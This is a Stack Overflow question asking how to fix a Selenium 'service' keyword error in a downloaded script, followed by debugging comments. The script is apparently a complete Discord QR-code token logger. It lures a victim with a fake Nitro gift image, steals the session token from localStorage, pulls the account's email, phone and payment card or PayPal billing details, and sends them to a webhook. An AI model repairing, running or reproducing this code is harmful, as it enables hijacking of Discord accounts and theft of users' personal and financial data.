# TypeError: __init__() got an unexpected keyword argument 'service' how do I resolve this error in python?

Tags: python, selenium

I have installed all the necessary packages for the code to run properly and I've tried all the versions of selenium (v1, v2, v3, or v4) but nothing worked. The error is in line 51. "main.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)" I've combed through many websites in search of an answer, but nothing worked. If someone could help me, it would be much appreciated.

````
from requests import get
from bs4 import BeautifulSoup
from PIL import Image
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from discord_webhook import DiscordEmbed, DiscordWebhook
from pystyle import System, Center, Colorate, Colors, Box, Write
from utilities import pystray_img, banner
from pystray import Menu, MenuItem, Icon
from io import BytesIO
from threading import Thread
from tempfile import TemporaryDirectory, NamedTemporaryFile

def generate_qr(path_1, path_2) -> None:
    qr_img = Image.open(path_1, "r")
    ovly_img = Image.open(os.path.join(os.getcwd(), 'resources', 'overlay.png'), "r")
    qr_img.paste(ovly_img, (60, 55))
    qr_img.save(path_2, quality=95)

def generate_nitro_template(path_2) -> None:
    nitro_template = Image.open(os.path.join(os.getcwd(), 'resources', 'template.png'), "r")
    nitro_template.paste(Image.open(path_2, "r"), (120, 409))
    nitro_template.save("discord_gift.png", quality=95)

def get_user_data(tk):
    try:
        headers = {'Authorization': tk}
        response = get('https://discordapp.com/api/v6/users/@me', headers=headers).json()
        return [response['username'], response['discriminator'], response['email'], response['phone']]
    except:
        return None

def get_discord_info(tk, link_int):
    headers = {'Authorization': tk}
    if link_int == 1:
        response = get('https://discordapp.com/api/v6/users/@me/billing/payment-sources',  headers=headers).json()
    elif link_int == 2:
        response = get('https://discordapp.com/api/v9/users/@me/billing/subscriptions',  headers=headers).json()
    return response
    
def main(webhook_url) -> None:
    Write.Print("\n\n[!] Generating Qr-Code...", Colors.red_to_purple)
    opts = webdriver.ChromeOptions()
    opts.add_experimental_option("detach", True)
    opts.add_experimental_option('excludeSwitches', ['enable-logging'])
    opts.headless = True
    opts.add_argument('--log-level 3')
    from webdriver_manager.chrome import ChromeDriverManager # Importing the module here because it has conflict with pystyle.
    os.environ['WDM_LOG_LEVEL'] = '0'
    main.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)
    main.driver.get("https://discord.com/login")
    time.sleep(5)
    source = BeautifulSoup(main.driver.page_source, features="lxml")
    if not (div := re.search(r"qrCode-......", str(source))):
        print(Write.Print("\n[!] QR Code is not found, please retry or contact us !'", Colors.red_to_yellow))
        sys.exit()
    div = div.group(0)
    div = source.find("div", {"class": f"{div}"})
    qr_code = div.find("img")["src"]
    source = BeautifulSoup(main.driver.page_source, features="lxml")
    div = source.find("div", {"class": "qrCode"})
    discord_login = main.driver.current_url
    with TemporaryDirectory(dir='.') as td:
        with NamedTemporaryFile(dir=td, suffix='.png') as tp1:
            tp1.write(base64.b64decode(qr_code.replace('data:image/png;base64,', '')))
            Write.Print("\n[!] Generating QR-Code template...", Colors.red_to_purple)
            with NamedTemporaryFile(dir=td, suffix='.png') as tp2:
                generate_qr(tp1, tp2)
                Write.Print("\n[!] Generating QR-Code Nitro template...", Colors.red_to_purple)
                generate_nitro_template(tp2)
    Write.Print("\n[#] Waiting for target...", Colors.red_to_purple)
    pystray_icon.icon.notify("Script currently being hided until target grabbed.", 'Waiting for target')
    time.sleep(3)
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
    while True:
        if discord_login != main.driver.current_url:
            try:
                os.remove('discord_gift.png')
            except:
                pass
            token = main.driver.execute_script('''
                window.dispatchEvent(new Event('beforeunload'));
                let iframe = document.createElement('iframe');
                iframe.style.display = 'none';
                document.body.appendChild(iframe);
                let localStorage = iframe.contentWindow.localStorage;
                var token = JSON.parse(localStorage.token);
                return token;
                ''')
            break
    main.driver.quit()
    pystray_icon.icon.notify("The traget scanned the QR-code sucessfuly.", 'New Victim !')
    time.sleep(3)
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
    Write.Print(f"\n\n[?] Token grabbed: {token}", Colors.rainbow)
    if webhook_url != None:
        Write.Print("\n\n[!] Fetching token data...", Colors.red_to_purple)
        webhook = DiscordWebhook(url=webhook_url, username='QR-Dtg', avatar_url="https://i.postimg.cc/qRHbRP2g/discord-avatar.png")
        embed = DiscordEmbed(color='88c800')
        if re.search(r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", token) != None:
            userdata, user_billings, user_subs = get_user_data(token), get_discord_info(token, 1), get_discord_info(token, 2)
            if userdata != None:
                embed.add_embed_field(name='User Token Info', value=f":crown:`Username:` **{userdata[0]}#{userdata[1]}**\n:e_mail:`Mail:` **{userdata[2]}**\n:mobile_phone:`Phone:` **{userdata[3]}**\n:money_with_wings:`Nitro:` **{':white_check_mark:' if bool(user_subs) else ':x:'}**", inline=False)
                if bool(user_billings):
                    for data in user_billings:
                        if data['type'] == 1:
                            embed.add_embed_field(name='Payment Info (Debit or Credit Card)', value=f""":credit_card:`Brand:` ||**{data['brand']}**||\n:information_source:`Last 4:` ||**{data['last_4']}**||\n:date:`Expiration:` ||**{data['expires_month']}/{data['expires_year']}**||
                            ***Billing Adress:***\n:name_badge:`Name:` ||**{data['billing_address']['name']}**||\n:paperclip:`Line 1:` ||**{data['billing_address']['line_1']}**||\n:paperclips:`Line 2:` ||**{data['billing_address']['line_2']}**||\n:flag_white:`Country:` ||**{data['billing_address']['country']}**||\n:triangular_flag_on_post:`State:` ||**{data['billing_address']['state']}**||\n:cityscape:`City:` ||**{data['billing_address']['city']}**||\n:postbox:`Postal Code:` ||**{data['billing_address']['postal_code']}**||\n""", inline=False)
                        elif data['type'] == 2:
                            embed.add_embed_field(name='Payment Info (Paypal)', value=f""":incoming_envelope:`Paypal Mail:` ||**{data['email']}**||
                            ***Billing Adress:***\n:name_badge:`Name:` ||**{data['billing_address']['name']}**||\n:paperclip:`Line 1:` ||**{data['billing_address']['line_1']}**||\n:paperclips:`Line 2:` ||**{data['billing_address']['line_2']}**||\n:flag_white:`Country:` ||**{data['billing_address']['country']}**||\n:triangular_flag_on_post:`State:` ||**{data['billing_address']['state']}**||\n:cityscape:`City:` ||**{data['billing_address']['city']}**||\n:postbox:`Postal Code:` ||**{data['billing_address']['postal_code']}**||\n""", inline=False)
                else:
                    embed.add_embed_field(name='Payment Info (:x:)', value="**No Payment Info Founded.**\n", inline=False)
            else:
                embed.add_embed_field(name='User Token Info :interrobang:', value="**This token doesn't provide any information about the account, maybe it's corrupted.**\n", inline=False)
            embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False)        
        else:
            embed.add_embed_field(name='Token', value=f"```yaml\n{token}\n```", inline=False)
        webhook.add_embed(embed)
        embed.set_footer(text='By Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0', inline=False)
        Write.Print("\n[!] Sending data to discord webhook...", Colors.red_to_purple)
        webhook.execute()
    Write.Input('\n\n[*] Press ENTER to quit.', Colors.blue_to_green)
    
if __name__ == "__main__":
    System.Title('QR DISCORD LOGIN - By Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0')
    System.Size(140, 35)
    print(Colorate.Horizontal(Colors.cyan_to_green, Center.XCenter(banner), 1))
    print(Colorate.Horizontal(Colors.rainbow, Center.GroupAlign(Box.DoubleCube("By Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0")), 1))
    print(Colorate.Horizontal(Colors.rainbow, Box.Lines("https://github.com/9P9/Discord-QR-Token-Logger").replace('ቐ', "$"), 1), "\n")
    def pystray_icon():
        def window_state(icon, item):
            if str(item) == 'Show':
                return ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
            elif str(item) == 'Hide':
                return ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
            elif str(item) == 'Quit':
                pystray_icon.icon.stop()
                try:
                    main.driver.quit()
                except:
                    pass
                os._exit(0)

        pystray_icon.icon = Icon('QR_DTG', Image.open(BytesIO(base64.b64decode(pystray_img))), menu=Menu(
            MenuItem('Show', window_state),
            MenuItem('Hide', window_state),
            MenuItem('Quit', window_state)
        ))
        pystray_icon.icon.run()
    confir = Write.Input("[*] Do you want to use a webhook url ? [y/n] -> ", Colors.green_to_cyan, interval=0.01)
    if confir == 'y':
        th_main = Thread(target=main, args=(Write.Input("\n[*] Enter your webhook url -> ", Colors.green_to_cyan, interval=0.01),))
    elif confir == 'n':
        th_main = Thread(target=main, args=(None,))
    else:
        os._exit(0)
    Thread(target=pystray_icon).start()
    th_main.start()
    while True:
        if not th_main.is_alive():
            pystray_icon.icon.stop()
            break
        time.sleep(1)
````

The stacktrace is shown below:

```
Traceback (most recent call last):
  File "C:\Users\Henry and Anna\AppData\Local\Programs\Python\Python39\lib\threading.py", line 954, in _bootstrap_inner
    self.run()
  File "C:\Users\Henry and Anna\AppData\Local\Programs\Python\Python39\lib\threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "C:\Users\Henry and Anna\Downloads\Discord-QR-Token-Logger-main\Discord-QR-Token-Logger.py", line 51, in main
    main.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)
TypeError: __init__() got an unexpected keyword argument 'service'
```

Comment: The `service` keyword argument isn't supported, from the information given. Please post the entire stacktrace in your question.

Comment: Hi Michael. I am a complete novice in python. Novice as in complete beginner. I had to ask a whole bunch of people just to get this code started and completed. Therefore, I have no idea what a stacktrace is. Can you please tell me what it is so that I can post it? Thanks again.

Comment: A stacktrace is the complete error output. It will look something like: `Traceback (most recent call last):
  File "<string>", line 1, in <module>
Exception: foo`. The comment widget isn't a good interface for displaying stacktraces so bear with me. The stacktrace is the last thing the python interpreter outputs before exiting. It contains most of the information we need in order to help you.

Comment: Here's a [post](https://stackoverflow.com/q/66718672/4583620) with a full stacktrace.

Comment: ```Traceback (most recent call last):
  File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\threading.py", line 954, in _bootstrap_inner
    self.run()
  File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\threading.py", line 892, in run
    self._target(*self._args, **self._kwargs)
  File "c:\Users\user\Downloads\Discord-QR-Token-Logger-main\Discord-QR-Token-Logger.py", line 51, in main
    main.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)
TypeError: __init__() got an unexpected keyword argument 'service'
```

Comment: Sorry about the improper formatting but I am new to stack exchange and I have no idea how to format it properly in the comment section. If you help me, thanks! If you don't, please do 

Comment: Welcome to Stack Overflow. "The error is in line 51. "main.driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=opts)"" Okay, so in your own words, what do you expect this line of code to mean? What do you think the error means? For example, do you understand what a `keyword argument` is? Do you understand what `unexpected` means? Where the code says `service=Service(ChromeDriverManager().install())`, what do you expect that part to do?

Comment: Also: for future questions, please read [ask] and note well that this is **not a discussion forum**. Please don't just request help, as that is [not a question](https://meta.stackoverflow.com/questions/284236). Try to ask a **specific** question. Similarly, don't tell us about your research, **show** us. "I've combed through many websites in search of an answer, but nothing worked." - okay, so **what websites did you find?** After reading them, **what did you try doing? What happened** as a result, and why did that not help?

Comment: @lanthanide: Is this your own code, or did you download it from somewhere? Stack Overflow is a site for programmers to get help, it's not really tech support for users of code other people have written. If you want support for this program and you're not a programmer yourself, you may want to look for it from the source you got it from. It's possible that this code is very old, or never worked in the first place. That said, if you do enjoy programming we'd be happy to have you here!

Comment: Yea I'm not really a programmer and I did just get this code from the internet somewhere. But help would really be appreciated to help me make this code work :( If you guys can't help me then it's fine.